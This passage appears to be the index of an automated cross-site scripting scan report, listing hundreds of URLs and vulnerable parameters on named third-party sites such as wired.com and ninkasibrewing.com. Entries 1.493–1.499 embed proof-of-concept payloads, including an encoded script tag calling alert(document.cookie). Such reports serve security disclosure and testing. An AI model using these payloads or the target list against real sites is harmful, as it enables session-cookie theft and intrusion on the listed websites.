
1.332. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1]

1.333. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1]

1.334. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1]

1.335. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1]

1.336. http://www.ninkasibrewing.com/media/ [REST URL parameter 1]

1.337. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1]

1.338. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1]

1.339. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1]

1.340. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1]

1.341. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1]

1.342. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1]

1.343. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1]

1.344. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1]

1.345. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1]

1.346. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1]

1.347. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1]

1.348. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1]

1.349. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1]

1.350. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1]

1.351. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1]

1.352. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1]

1.353. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1]

1.354. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1]

1.355. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1]

1.356. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1]

1.357. http://www.ninkasibrewing.com/process/ [REST URL parameter 1]

1.358. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1]

1.359. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1]

1.360. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1]

1.361. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1]

1.362. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1]

1.363. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1]

1.364. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1]

1.365. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1]

1.366. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1]

1.367. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1]

1.368. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1]

1.369. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1]

1.370. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1]

1.371. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1]

1.372. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1]

1.373. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1]

1.374. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1]

1.375. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1]

1.376. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1]

1.377. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1]

1.378. http://www.opensecrets.org/politicians/contrib.php [cid parameter]

1.379. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.380. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.381. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.382. http://www.opensecrets.org/politicians/contrib.php [type parameter]

1.383. http://www.openstreetmap.org/ [mlat parameter]

1.384. http://www.openstreetmap.org/ [mlon parameter]

1.385. http://www.openstreetmap.org/ [zoom parameter]

1.386. http://www.partizan.com/partizan/musicvideos/ [name of an arbitrarily supplied request parameter]

1.387. http://www.partizan.com/partizan/musicvideos/ [saam_farahmand parameter]

1.388. http://www.physorg.com/ [name of an arbitrarily supplied request parameter]

1.389. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.390. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.391. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.392. http://www.plosone.org/article/info:doi/10.1371/journal.pone.0015502 [name of an arbitrarily supplied request parameter]

1.393. http://www.plusmo.com/add [url parameter]

1.394. http://www.plusmo.com/add [url parameter]

1.395. http://www.plusmo.com/add [url parameter]

1.396. http://www.pollmonkey.com/s.asp [c parameter]

1.397. http://www.primidi.com/rss.xml [REST URL parameter 1]

1.398. http://www.primidi.com/rss.xml [REST URL parameter 1]

1.399. http://www.rockpapershotgun.com/2010/11/17/solving-biowares-code-shattered-steel/ [name of an arbitrarily supplied request parameter]

1.400. http://www.sega.com/games/sonic-colors/ [name of an arbitrarily supplied request parameter]

1.401. http://www.shacknews.com/ [name of an arbitrarily supplied request parameter]

1.402. http://www.slashgear.com/ [name of an arbitrarily supplied request parameter]

1.403. http://www.smartertravel.com/vacation-package/ [REST URL parameter 1]

1.404. http://www.streettech.com/ [name of an arbitrarily supplied request parameter]

1.405. http://www.streettech.com/backend.php [REST URL parameter 1]

1.406. http://www.stumbleupon.com/submit [url parameter]

1.407. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.408. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.409. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.410. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.411. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

1.412. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

1.413. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.414. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.415. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.416. https://www.survey-xact.dk/LinkCollector [key parameter]

1.417. http://www.thatsfit.com/2009/11/30/master-cleanse/ [name of an arbitrarily supplied request parameter]

1.418. http://www.thinkgeek.com/electronics/home-entertainment/cf9b/ [REST URL parameter 2]

1.419. http://www.treasuryandrisk.com/Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx [k parameter]

1.420. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]

1.421. http://www.twelvehorses.com/S1/RX1ANT/2LVIU6XP/M/ [REST URL parameter 4]

1.422. http://www.universalorlando.com/merchandise/HPCategoryList.aspx [categoryName parameter]

1.423. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

1.424. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

1.425. http://www.universalorlando.com/merchandise/HPProductList.aspx [CategoryName parameter]

1.426. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

1.427. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

1.428. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 1]

1.429. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 2]

1.430. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 3]

1.431. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 1]

1.432. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 2]

1.433. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 3]

1.434. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 1]

1.435. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 2]

1.436. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 3]

1.437. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 1]

1.438. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 2]

1.439. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 3]

1.440. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 1]

1.441. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 2]

1.442. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 3]

1.443. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 1]

1.444. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 2]

1.445. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 3]

1.446. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 1]

1.447. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 2]

1.448. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 3]

1.449. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 1]

1.450. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 2]

1.451. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 3]

1.452. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 1]

1.453. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 2]

1.454. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 3]

1.455. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 1]

1.456. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 2]

1.457. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 3]

1.458. http://www.wired.com/blogs [REST URL parameter 1]

1.459. http://www.wired.com/blogs/ [REST URL parameter 1]

1.460. http://www.wired.com/cars [REST URL parameter 1]

1.461. http://www.wired.com/cars/ [REST URL parameter 1]

1.462. http://www.wired.com/cars/coolwheels [REST URL parameter 1]

1.463. http://www.wired.com/cars/coolwheels [REST URL parameter 2]

1.464. http://www.wired.com/cars/energy [REST URL parameter 1]

1.465. http://www.wired.com/cars/energy [REST URL parameter 2]

1.466. http://www.wired.com/cars/futuretransport [REST URL parameter 1]

1.467. http://www.wired.com/cars/futuretransport [REST URL parameter 2]

1.468. http://www.wired.com/culture [REST URL parameter 1]

1.469. http://www.wired.com/culture/ [REST URL parameter 1]

1.470. http://www.wired.com/culture/art [REST URL parameter 1]

1.471. http://www.wired.com/culture/art [REST URL parameter 2]

1.472. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 1]

1.473. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 2]

1.474. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 3]

1.475. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 1]

1.476. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 2]

1.477. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 3]

1.478. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 1]

1.479. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 2]

1.480. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 3]

1.481. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]

1.482. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 1]

1.483. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 2]

1.484. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 3]

1.485. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 1]

1.486. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 2]

1.487. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 3]

1.488. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

1.489. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

1.490. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

1.491. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

1.492. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.493. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.494. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

parameter]

1.495. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

1.496. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">

HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

1.497. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.498. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.499. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.500. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]

1.501. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [slideView parameter]

1.502. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 1]

1.503. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 2]

1.504. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 3]

1.505. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]

1.506. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 1]

1.507. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 2]

1.508. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 3]

1.509. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]

1.510. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 1]

1.511. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 2]

1.512. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 3]

1.513. http://www.wired.com/culture/culturereviews [REST URL parameter 1]

1.514. http://www.wired.com/culture/culturereviews [REST URL parameter 2]

1.515. http://www.wired.com/culture/design [REST URL parameter 1]

1.516. http://www.wired.com/culture/design [REST URL parameter 2]

1.517. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 1]

1.518. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 2]

1.519. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 3]

1.520. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]

1.521. http://www.wired.com/culture/education [REST URL parameter 1]

1.522. http://www.wired.com/culture/education [REST URL parameter 2]

1.523. http://www.wired.com/culture/lifestyle [REST URL parameter 1]

1.524. http://www.wired.com/culture/lifestyle [REST URL parameter 2]

1.525. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 1]

1.526. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 2]

1.527. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 3]

1.528. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]

1.529. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 1]

1.530. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 2]

1.531. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 3]

1.532. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]

1.533. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 1]

1.534. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 2]

1.535. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 3]

1.536. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 1]

1.537. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 2]

1.538. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 3]

1.539. http://www.wired.com/customerservice [REST URL parameter 1]

1.540. http://www.wired.com/entertainment [REST URL parameter 1]

1.541. http://www.wired.com/entertainment/ [REST URL parameter 1]

1.542. http://www.wired.com/entertainment/hollywood [REST URL parameter 1]

1.543. http://www.wired.com/entertainment/hollywood [REST URL parameter 2]

1.544. http://www.wired.com/entertainment/music [REST URL parameter 1]

1.545. http://www.wired.com/entertainment/music [REST URL parameter 2]

1.546. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 1]

1.547. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 2]

1.548. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 3]

1.549. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 1]

1.550. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 2]

1.551. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 3]

1.552. http://www.wired.com/entertainment/theweb [REST URL parameter 1]

1.553. http://www.wired.com/entertainment/theweb [REST URL parameter 2]

1.554. http://www.wired.com/gadgets [REST URL parameter 1]

1.555. http://www.wired.com/gadgets/ [REST URL parameter 1]

1.556. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 1]

1.557. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 2]

1.558. http://www.wired.com/gadgets/displays [REST URL parameter 1]

1.559. http://www.wired.com/gadgets/displays [REST URL parameter 2]

1.560. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 1]

1.561. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 2]

1.562. http://www.wired.com/gadgets/mac [REST URL parameter 1]

1.563. http://www.wired.com/gadgets/mac [REST URL parameter 2]

1.564. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 1]

1.565. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 2]

1.566. http://www.wired.com/gadgets/mods [REST URL parameter 1]

1.567. http://www.wired.com/gadgets/mods [REST URL parameter 2]

1.568. http://www.wired.com/gadgets/pcs [REST URL parameter 1]

1.569. http://www.wired.com/gadgets/pcs [REST URL parameter 2]

1.570. http://www.wired.com/gadgets/portablemusic [REST URL parameter 1]

1.571. http://www.wired.com/gadgets/portablemusic [REST URL parameter 2]

1.572. http://www.wired.com/gadgets/wireless [REST URL parameter 1]

1.573. http://www.wired.com/gadgets/wireless [REST URL parameter 2]

1.574. http://www.wired.com/gaming [REST URL parameter 1]

1.575. http://www.wired.com/gaming/ [REST URL parameter 1]

1.576. http://www.wired.com/gaming/gamingreviews [REST URL parameter 1]

1.577. http://www.wired.com/gaming/gamingreviews [REST URL parameter 2]

1.578. http://www.wired.com/gaming/hardware [REST URL parameter 1]

1.579. http://www.wired.com/gaming/hardware [REST URL parameter 2]

1.580. http://www.wired.com/gaming/virtualworlds [REST URL parameter 1]

1.581. http://www.wired.com/gaming/virtualworlds [REST URL parameter 2]

1.582. http://www.wired.com/inspiredbyyou/2010/07/electric-car-grid/ [ibypid parameter]

1.583. http://www.wired.com/inspiredbyyou/2010/07/events-calendar [ibypid parameter]

1.584. http://www.wired.com/inspiredbyyou/2010/07/must-sees/ [ibypid parameter]

1.585. http://www.wired.com/inspiredbyyou/2010/07/the-list [ibypid parameter]

1.586. http://www.wired.com/inspiredbyyou/2010/07/tweetcarts [ibypid parameter]

1.587. http://www.wired.com/inspiredbyyou/2010/08/english-japanese-emoticon-translator/ [ibypid parameter]

1.588. http://www.wired.com/inspiredbyyou/2010/08/top-ten-most-popular-celebrities/ [ibypid parameter]

1.589. http://www.wired.com/inspiredbyyou/2010/09/ascent-of-robot/ [ibypid parameter]

1.590. http://www.wired.com/inspiredbyyou/2010/09/bittorrent-or-box-office/ [ibypid parameter]

1.591. http://www.wired.com/inspiredbyyou/2010/09/re-animators/ [ibypid parameter]

1.592. http://www.wired.com/inspiredbyyou/2010/09/the-molecular-pantry/ [ibypid parameter]

1.593. http://www.wired.com/inspiredbyyou/2010/10/buy-it-or-burn-it [ibypid parameter]

1.594. http://www.wired.com/inspiredbyyou/2010/10/peak-everything [ibypid parameter]

1.595. http://www.wired.com/inspiredbyyou/2010/10/turkeys-and-triumphs [ibypid parameter]

1.596. http://www.wired.com/inspiredbyyou/2010/11/avoiding-bad-holiday-albums [ibypid parameter]

1.597. http://www.wired.com/medtech [REST URL parameter 1]

1.598. http://www.wired.com/medtech/ [REST URL parameter 1]

1.599. http://www.wired.com/medtech/drugs [REST URL parameter 1]

1.600. http://www.wired.com/medtech/drugs [REST URL parameter 2]

1.601. http://www.wired.com/medtech/genetics [REST URL parameter 1]

1.602. http://www.wired.com/medtech/genetics [REST URL parameter 2]

1.603. http://www.wired.com/medtech/health [REST URL parameter 1]

1.604. http://www.wired.com/medtech/health [REST URL parameter 2]

1.605. http://www.wired.com/medtech/stemcells [REST URL parameter 1]

1.606. http://www.wired.com/medtech/stemcells [REST URL parameter 2]

1.607. http://www.wired.com/multimedia [REST URL parameter 1]

1.608. http://www.wired.com/multimedia/ [REST URL parameter 1]

1.609. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 2]

1.610. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 3]

1.611. http://www.wired.com/politics [REST URL parameter 1]

1.612. http://www.wired.com/politics/ [REST URL parameter 1]

1.613. http://www.wired.com/politics/law [REST URL parameter 1]

1.614. http://www.wired.com/politics/law [REST URL parameter 2]

1.615. http://www.wired.com/politics/onlinerights [REST URL parameter 1]

1.616. http://www.wired.com/politics/onlinerights [REST URL parameter 2]

1.617. http://www.wired.com/politics/security [REST URL parameter 1]

1.618. http://www.wired.com/politics/security [REST URL parameter 2]

1.619. http://www.wired.com/science [REST URL parameter 1]

1.620. http://www.wired.com/science/ [REST URL parameter 1]

1.621. http://www.wired.com/science/discoveries [REST URL parameter 1]

1.622. http://www.wired.com/science/discoveries [REST URL parameter 2]

1.623. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 1]

1.624. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 2]

1.625. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 3]

1.626. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 1]

1.627. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 2]

1.628. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 3]

1.629. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 1]

1.630. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 2]

1.631. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 3]

1.632. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 1]

1.633. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 2]

1.634. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 3]

1.635. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 1]

1.636. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 2]

1.637. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 3]

1.638. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 1]

1.639. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 2]

1.640. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 3]

1.641. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 1]

1.642. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 2]

1.643. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 3]

1.644. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 1]

1.645. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 2]

1.646. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 3]

1.647. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 1]

1.648. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 2]

1.649. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 3]

1.650. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 1]

1.651. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 2]

1.652. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 3]

1.653. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 1]

1.654. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 2]

1.655. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 3]

1.656. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 1]

1.657. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 2]

1.658. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 3]

1.659. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 1]

1.660. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 2]

1.661. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 3]

1.662. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 1]

1.663. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 2]

1.664. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 3]

1.665. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 1]

1.666. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 2]

1.667. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 3]

1.668. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 1]

1.669. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 2]

1.670. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 3]

1.671. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 1]

1.672. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 2]

1.673. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 3]

1.674. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 1]

1.675. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 2]

1.676. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 3]

1.677. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 1]

1.678. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 2]

1.679. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 3]

1.680. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 1]

1.681. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 2]

1.682. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 3]

1.683. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 1]

1.684. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 2]

